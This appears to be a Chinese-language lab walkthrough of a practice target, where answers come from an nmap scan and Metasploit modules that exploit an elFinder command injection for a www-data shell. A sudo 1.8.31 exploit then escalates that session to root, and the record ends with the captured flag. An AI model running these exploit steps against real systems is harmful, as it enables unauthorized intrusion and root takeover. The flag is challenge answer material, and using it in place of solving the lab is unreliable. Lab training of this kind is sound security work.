实用指南：MSF会话管理靶机（打靶记录）

回答下面的挑战，完成本任务并获得对应奖励

目标有一个特定的Web应用程序正在运行，大家可以通过查看HTML源代码来找到它。那个Web应用程序的名称是什么？

nmap -sS -p 1-10000 10.22.230.130

elFinder

在MSF中找到现有的漏洞，并使用它在目标上获取一个shell。你获得shell的用户的用户名是什么？

sudo msfconsole

search elFinder

use exploit/linux/http/elfinder_archive_cmd_injection

Options

set RHOSTS 10.22.230.130

set LHOST 10.132.1.91

set RPORT 8080

Exploit

Shell

Whoami

www-data

目标架构运行着旧版本的Sudo。找到相关漏洞并获取目标系统的root访问权限。找到/root/flag.txt文件并将其内容提交为答案。

sudo --version

Ctrl+Z两次

back

search Sudo version 1.8.31

use 0

Options

Sessions

set SESSION 1

set LHOST 10.132.1.91

Exploit

cd /root

cat flag.txt

NextCyber{9llDo3Xl-dQ1y4}